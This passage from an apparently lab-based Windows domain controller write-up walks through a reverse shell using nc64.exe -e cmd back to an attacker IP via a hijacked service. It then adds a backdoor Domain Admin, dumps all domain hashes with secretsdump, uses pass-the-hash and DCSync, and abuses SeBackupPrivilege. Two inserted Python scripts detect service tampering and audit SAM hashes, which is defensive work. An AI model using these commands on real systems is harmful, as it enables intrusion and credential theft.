Info: Uploading /home/kali/Desktop/nc64.exe to C:\Temp\nc64.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Temp>

Use the following command to reconfigure the service so that it connects back to our attacking machine:

*Evil-WinRM* PS C:\Temp> sc.exe config VSS binpath= "C:\windows\system32\cmd.exe /c C:\Temp\nc64.exe -e cmd 10.10.14.70 4444"
[SC] ChangeServiceConfig SUCCESS

The service was reconfigured successfully; next, start it and catch the connection on our listener:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...
connect to [10.10.14.70] from return.local [10.129.217.15] 53605
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
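As a detection-side counterpart to the chain above, here is an added example (mine, not from the original write-up) that flags the registry write behind `sc.exe config VSS binpath=...`. It assumes Sysmon Event ID 13 (registry value set) records with the usual TargetObject/Details/Image fields; the sample records and the VSS baseline value are constructed for the example, and a real deployment would load its baseline from a golden image rather than a hard-coded dict.

```python
import re

# Value that `sc.exe config <service> binpath=` rewrites; Sysmon reports it as the TargetObject.
IMAGEPATH_KEY = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d{3})\\Services\\(?P<svc>[^\\]+)\\ImagePath$",
    re.IGNORECASE,
)
# Interpreters and script hosts that are never a legitimate service executable by themselves.
INTERPRETER = re.compile(
    r"\\(?:cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe\b", re.IGNORECASE
)
# Directories a non-admin account can normally write to; a service binary should not live there.
WRITABLE_DIR = re.compile(r"[A-Z]:\\(?:Temp|Users|ProgramData|Windows\\Temp)\\", re.IGNORECASE)
# Known-good ImagePath per service (assumption: sourced from a baseline export in practice).
# VSS is listed because it is the service abused in this write-up.
BASELINE = {"vss": r"%systemroot%\system32\vssvc.exe"}


def assess_imagepath(service: str, value: str) -> list:
    """Return the reasons this ImagePath value looks tampered with (empty list = looks fine)."""
    reasons = []
    if INTERPRETER.search(value):
        reasons.append("interpreter used as service binary")
    if WRITABLE_DIR.search(value):
        reasons.append("references a user-writable directory")
    expected = BASELINE.get(service.lower())
    if expected and value.strip('"').lower() != expected.lower():
        reasons.append(f"deviates from baseline {expected}")
    return reasons


def detect_service_tampering(records: list) -> list:
    """Scan Sysmon-style registry records and return alerts for suspicious ImagePath writes."""
    alerts = []
    for rec in records:
        if rec.get("EventID") != 13:  # Sysmon Event ID 13 = RegistryEvent (Value Set)
            continue
        match = IMAGEPATH_KEY.match(rec.get("TargetObject", ""))
        if not match:
            continue
        reasons = assess_imagepath(match["svc"], rec.get("Details", ""))
        if reasons:
            # The write is normally performed by the SCM (services.exe) on the caller's behalf,
            # so the rule keys on the value written; the account that ran sc.exe is recovered by
            # correlating with the sc.exe process-creation event (Sysmon 1 / Security 4688).
            alerts.append({"service": match["svc"], "value": rec["Details"],
                           "writer": rec.get("Image"), "reasons": reasons})
    return alerts


# Constructed sample records modelled on Sysmon Event ID 13 fields.
SAMPLE_RECORDS = [
    {   # the write produced by the sc.exe config command used above
        "EventID": 13, "EventType": "SetValue",
        "Image": r"C:\Windows\System32\services.exe",
        "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\VSS\ImagePath",
        "Details": r"C:\windows\system32\cmd.exe /c C:\Temp\nc64.exe -e cmd 10.10.14.70 4444",
    },
    {   # benign: a vendor installer registering its own agent under Program Files
        "EventID": 13, "EventType": "SetValue",
        "Image": r"C:\Windows\System32\services.exe",
        "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\VendorAgent\ImagePath",
        "Details": r'"C:\Program Files\Vendor\agent.exe" -service',
    },
    {   # benign: a start-type change on the spooler touches a different value name
        "EventID": 13, "EventType": "SetValue",
        "Image": r"C:\Windows\System32\services.exe",
        "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler\Start",
        "Details": "DWORD (0x00000004)",
    },
]

if __name__ == "__main__":
    for alert in detect_service_tampering(SAMPLE_RECORDS):
        print(alert)
```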

Then create a temporary user, add it to Domain Admins, and dump every hash in the domain:

C:\Users\Administrator\Desktop>net user hacker P@ssw0rd123!
C:\Users\Administrator\Desktop>net group "Domain Admins" hacker /add /domain
net group "Domain Admins" hacker /add /domain
The command completed successfully.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump return.local/hacker:'P@ssw0rd123!'@10.129.217.15
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RETURN\PRINTER$:aes256-cts-hmac-sha1-96:f1742d1b78c89a9d083c26369dc2c4259239801f940a8cacc9055bac5cdfba4d
RETURN\PRINTER$:aes128-cts-hmac-sha1-96:46efbc5c55b316fe2d33d207fbecc859
RETURN\PRINTER$:des-cbc-md5:85b02a0e25d3ae40
RETURN\PRINTER$:plain_password_hex:f343a0895418a7c18a3c35bb4bb62c258e321a07d901aecc29f172468d3c69bbb392a6d95961d8368aac6bf342ce28781812bdad9b9f913cf98b94b59e901c288ef8769c245a8446ed49c577c58e38379d0bd74366c95550330946105e365b1d0b798dab723e3411a9ad55561300930ecf5344c136aef88ef76f32ce8b9661ec04f612b7510fcb6321470db47eb1d71283db7ef9ffc0539297050ea63786792f04b7931ce7ada25e17ba8a7710f40f7b7010be398135e317a69f60291d9403a550983f84f3aebf4b0f36c114c528d43910fff484ede15d79834f55350e91c77b76c7cc124b0d66020c291563a700b10a
RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:2a2c8013b8be82cd6dfbd3603829fced:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM
0000 16 BD CA 34 21 A5 5C AD 51 ED B1 7E 4A 4F 59 B8 ...4!.\.Q..~JOY.
0010 C3 65 1E 1A 5D 6D 97 82 79 3A 58 A0 FC 2B B5 8B .e..]m..y:X..+..
0020 A4 E2 9B CF DD 7B 52 80 99 33 45 4F F1 35 15 DC .....{R..3EO.5..
0030 4F 99 B3 A1 CB 55 21 A5 CC F5 27 43 F7 16 AA BC O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
hacker:6601:aad3b435b51404eeaad3b435b51404ee:7dfa0531d73101ca080c7379a9bff1c7:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:2a2c8013b8be82cd6dfbd3603829fced:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
hacker:aes256-cts-hmac-sha1-96:3de68d74694bc5bb98300076dc1421b614d6cdac92bf32edef3db8d04c53cd78
hacker:aes128-cts-hmac-sha1-96:a65c3c4ae658ad47908f773b06dcaff8
hacker:des-cbc-md5:3bc123622a52c7dc
PRINTER$:aes256-cts-hmac-sha1-96:f1742d1b78c89a9d083c26369dc2c4259239801f940a8cacc9055bac5cdfba4d
PRINTER$:aes128-cts-hmac-sha1-96:46efbc5c55b316fe2d33d207fbecc859
PRINTER$:des-cbc-md5:c1ecab8fa8ea8fba
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f53ce9b7740>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f53ce9b7740>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

We have successfully dumped the hashes of every account in the domain. With the Administrator NTLM hash we can pass-the-hash straight into WinRM:

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# evil-winrm -i 10.129.217.15 -u Administrator -H 32db622ed9c00dd1039d8288b0407460

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
return\administrator

Remember to delete the backdoor account afterwards:

C:\Users\Administrator\Desktop>net user hacker /del /domain
net user hacker /del /domain
The command completed successfully.

If you would rather not add an account at all, you can also use Mimikatz to grab the administrator's hash via DCSync:

mimikatz # lsadump::dcsync /domain:return.local /user:Administrator
[DC] 'return.local' will be the domain
[DC] 'printer.return.local' will be the DC server
[DC] 'Administrator' will be the user account

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/16/2021 7:03:22 AM
Object Security ID : S-1-5-21-3750359090-2939318659-876128439-500
Object Relative ID : 500

Credentials:
Hash NTLM: 32db622ed9c00dd1039d8288b0407460
ntlm- 0: 32db622ed9c00dd1039d8288b0407460
ntlm- 1: 4c3e0997511a76643796c05ec063a4cd
ntlm- 2: 9307ee5abf7791f3424d9d5148b20177
lm - 0: e62e965d90b480e63ead2fb35e0ed021
lm - 1: 9d430c68ed289de735133e92abaf338b

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 63043f578ffb1fcb7fa3ab8fd93e9e04

* Primary:Kerberos-Newer-Keys *
Default Salt : RETURN.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
aes128_hmac (4096) : ef8673c4ba668752432c817dda62af48
des_cbc_md5 (4096) : 4f0ee6291aabd338
OldCredentials
aes256_hmac (4096) : 1faded14e2c0c28e9f5909d983fa7952fc17fa2070ab887279e4bc42bd33b16b
aes128_hmac (4096) : ebdb065faae061ac8d87b51a61083ef8
des_cbc_md5 (4096) : 4ffb0df483a1ae51
OlderCredentials
aes256_hmac (4096) : e1ff2edb6ac2d49b1da85c90bed5146e24a9f59415266fe64bd7dfe89349d8fb
aes128_hmac (4096) : 672fdcafc23ad22ac58d9c060671d95d
des_cbc_md5 (4096) : 15cefb73078a5eae

* Primary:Kerberos *
Default Salt : RETURN.LOCALAdministrator
Credentials
des_cbc_md5 : 4f0ee6291aabd338
OldCredentials
des_cbc_md5 : 4ffb0df483a1ae51

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 0797b115cc2324cce88392a06ac4e284
02 992e47cac4aa3b47ee723ebd669cf207
03 8fdb31961a9b5bcd5db4ae60f9fb6257
04 0797b115cc2324cce88392a06ac4e284
05 6dddc0c623178fcd6e8bea8458bdba99
06 d9edbe870f9346be84128ec5a3162ee6
07 1b282205eb9e33deb217879d07d0b932
08 3491410859d08fc09cf22773b4b4923a
09 538a01f3e75e7728e7d24bc4dad7b530
10 d6ec5a25b87f1adfd7ec5075500f128e
11 7489e021b3817e10e6f3cdf40eef0ebb
12 3491410859d08fc09cf22773b4b4923a
13 b28fd605e6bd7504c95a73b4ec5214a2
14 46bd660ab25cefa62d0be0827584aeae
15 3747cc89e0b405cb11a26f319fdfeed9
16 a73d18a151bbd26ee9e2bd2326d94b29
17 0430b932e7d3eb18b7ef145a08f4afbb
18 6193a72374c23557df4fff745c736310
19 4b11a5dfa90e09d5690b6b4f66fbcf45
20 00d872ff13ccc0771d4631796c89b3a1
21 8a721283b23ac92d6d64127ab6e8178e
22 504b8bcb63a12c9f25e7b654c5988551
23 3ea9a60e4d353865b44d4a57c3aa14cc
24 6f939637394f1bc07dd76839f7256f77
25 9639a3391f41d92931cb59b63cc18f72
26 aa163bb1a981f4cba3087adfcbd66bbe
27 3005fe76504063855f9e8e183357630d
28 fefedb2e54c148301966c135876b3c42
29 a5a5361ea9c83770fc745f3bf6ccdf1e

7. Alternative privilege escalation path: reading sensitive files with SeBackupPrivilege

Looking around afterwards, we found that our account also holds SeBackupPrivilege.

That gives us an even simpler option: use robocopy to copy root.txt straight into our own folder. The /B switch opens the files in backup mode, which is exactly what this privilege allows, so the ACL on the Administrator's desktop no longer matters:

*Evil-WinRM* PS C:\Temp> robocopy /B C:\Users\Administrator\Desktop C:\Temp

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Wednesday, January 14, 2026 8:43:07 PM
Source : C:\Users\Administrator\Desktop\
Dest : C:\Temp\

Files : *.*

Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

2 C:\Users\Administrator\Desktop\
*EXTRA File 45272 nc64.exe
New File 282 desktop.ini
0%
100%
New File 34 root.txt
0%
100%

------------------------------------------------------------------------------

Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 2 2 0 0 0 1
Bytes : 316 316 0 0 0 44.2 k
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Wednesday, January 14, 2026 8:43:07 PM

*Evil-WinRM* PS C:\Temp> dir


Directory: C:\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/14/2026 8:22 PM 45272 nc64.exe
-ar--- 1/14/2026 6:18 PM 34 root.txt

We can go even further and back up the SAM and SYSTEM hives directly, then download them and extract the hashes offline:

*Evil-WinRM* PS C:\Temp> reg save hklm\sam sam
The operation completed successfully.

*Evil-WinRM* PS C:\Temp> reg save hklm\system system
The operation completed successfully.

*Evil-WinRM* PS C:\Temp> download sam

Info: Downloading C:\Temp\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system

Info: Downloading C:\Temp\system to system

Info: Download successful!
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -sam sam -system system local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

However, this hash cannot be used to log in as the administrator. The exported SAM and SYSTEM files actually contain only the hashes of local accounts.

The special nature of a domain controller: the core database of a DC is NTDS.dit, not SAM. Domain user hashes (including Domain Admins) are stored in NTDS.dit.

  • What is in the SAM? On a DC, the SAM file normally contains only the DSRM (Directory Services Restore Mode) administrator password, and that password cannot usually be used for remote logon (WinRM/SMB) unless the registry setting (DsrmAdminLogonBehavior) has been changed.
  • The correct approach: when using SeBackupPrivilege, besides SAM/SYSTEM you must extract C:\Windows\NTDS\ntds.dit through VSS (Volume Shadow Copy) or diskshadow. Only with both ntds.dit and the SYSTEM hive can the real domain administrator hashes be recovered.
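As an added example (not code from the original writeup), the following Python parses secretsdump's `user:rid:lmhash:nthash:::` lines from the local SAM dump above and applies the checks a defender reviewing a DC would want: whether LM hashes are still stored, which accounts carry the empty-password NT hash, and whether the RID-500 (DSRM) hash equals the domain Administrator NT hash from the DCSync output, which would mean the DSRM password is reused. The sample input is the page's own output; the function names are my own.

```python
import re

# Sample input (copied from the secretsdump output above): the local SAM of the DC.
SAM_DUMP = """[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up..."""

# Domain Administrator NT hash from the DCSync output above (stored in NTDS, not in SAM).
DOMAIN_ADMIN_NT = "32db622ed9c00dd1039d8288b0407460"

# Well-known constants: LM field printed when no LM hash is stored, and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def parse_secretsdump(text):
    """Return a list of {user, rid, lm, nt} dicts, one per hash line; status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["rid"] = int(e["rid"])
            entries.append(e)
    return entries


def audit_dc_sam(entries, domain_admin_nt):
    """Findings for a SAM dump taken on a DC: LM storage, empty passwords, DSRM password reuse."""
    findings = []
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings.append(f"{e['user']}: LM hash stored (LM storage should be disabled)")
        if e["nt"] == EMPTY_NT:
            findings.append(f"{e['user']}: NT hash of an empty password (account must stay disabled)")
        if e["rid"] == 500:  # on a DC the SAM's RID-500 account is the DSRM administrator
            if e["nt"] == domain_admin_nt.lower():
                findings.append("DSRM administrator reuses the domain Administrator password")
            else:
                findings.append("DSRM administrator hash differs from the domain Administrator hash")
    return findings


if __name__ == "__main__":
    for finding in audit_dc_sam(parse_secretsdump(SAM_DUMP), DOMAIN_ADMIN_NT):
        print(finding)
```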

Author: Skyarrow
Posted on: January 15, 2026
http://example.com/2026/01/15/从零开始的windows生活-Return/